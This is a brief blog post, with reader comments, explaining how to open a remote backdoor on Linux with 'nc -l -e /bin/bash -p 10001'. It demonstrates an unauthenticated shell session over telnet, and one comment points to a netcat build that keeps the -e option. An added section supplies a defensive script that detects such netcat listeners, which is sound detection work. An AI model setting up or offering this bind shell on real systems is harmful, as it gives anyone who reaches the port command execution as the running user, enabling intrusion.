Remote backdoor on Linux using ‘nc’

nc -l -e /bin/bash -p 10001

Not much to explain here. -l listens for incoming connections, -e executes /bin/bash when you connect, and -p chooses the port to listen on.

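You must use a semicolon after each command. telnet ends each line with a carriage return and line feed, and without the semicolon bash treats the carriage return as part of the command name.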

$ telnet localhost 10001
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
whoami;
will

There you go. Obviously this has the potential for misuse; running this as root will create a remote backdoor after all. But it’s also a very useful administrative tool. Keep in mind that nc does not encrypt the traffic or authenticate the client in any way, so anyone who can reach the port could use this to connect and run commands as the user who started nc.

nc terminates after you exit your connection, and only one person can be connected at once.
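
A defender's check for the listener shown above, added here as an example and not part of the original post: it inspects process command lines for a netcat started with both -l and -e. The function names, the list of binary names and the sample argv lists are assumptions, and the flag matching is a heuristic.

```sh
#!/bin/sh
# Added example: find netcat processes started as "listen and exec".

# Return 0 when the argv given as "$@" is netcat with both -l and -e.
# Heuristic: bundled short options (-le) are matched by letter, so an
# option with an attached value containing "l" or "e" can false-positive.
is_nc_exec_listener() {
    case "${1##*/}" in
        nc|ncat|netcat|nc.traditional) ;;   # assumed binary names
        *) return 1 ;;
    esac
    shift
    listen=0; exec_flag=0
    for arg in "$@"; do
        case "$arg" in
            --listen) listen=1 ;;            # long forms (GNU netcat, Ncat)
            --exec|--exec=*) exec_flag=1 ;;
            --*) ;;
            -*) case "$arg" in *l*) listen=1 ;; esac
                case "$arg" in *e*) exec_flag=1 ;; esac ;;
        esac
    done
    [ "$listen" -eq 1 ] && [ "$exec_flag" -eq 1 ]
}

# Linux only: print "PID<TAB>command line" for every matching process.
scan_proc() {
    for f in /proc/[0-9]*/cmdline; do
        [ -r "$f" ] || continue
        # cmdline is NUL-separated: split on newlines, globbing disabled
        if ( set -f; IFS='
'; set -- $(tr '\0' '\n' 2>/dev/null < "$f"); is_nc_exec_listener "$@" ); then
            pid=${f#/proc/}; pid=${pid%/cmdline}
            printf '%s\t%s\n' "$pid" "$(tr '\0' ' ' 2>/dev/null < "$f")"
        fi
    done
}

# Constructed argv lists, not captured from a real host
is_nc_exec_listener nc -l -e /bin/bash -p 10001 && echo "flagged: nc -l -e /bin/bash -p 10001"
is_nc_exec_listener nc -l -p 10001 || echo "ignored: nc -l -p 10001"
```

Call scan_proc on a Linux host to apply the same check to every running process.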

2 Responses to “Remote backdoor on Linux using ‘nc’”

  1. ardnew says:

    From my experience, the nc builds most distros release disable the -e option.

  2. termina says:

    Debian and Ubuntu don’t; I can’t imagine any good distro would. 🙂

    If your distro does, just grab nc from here: http://netcat.sourceforge.net/source.php?url=/download.php
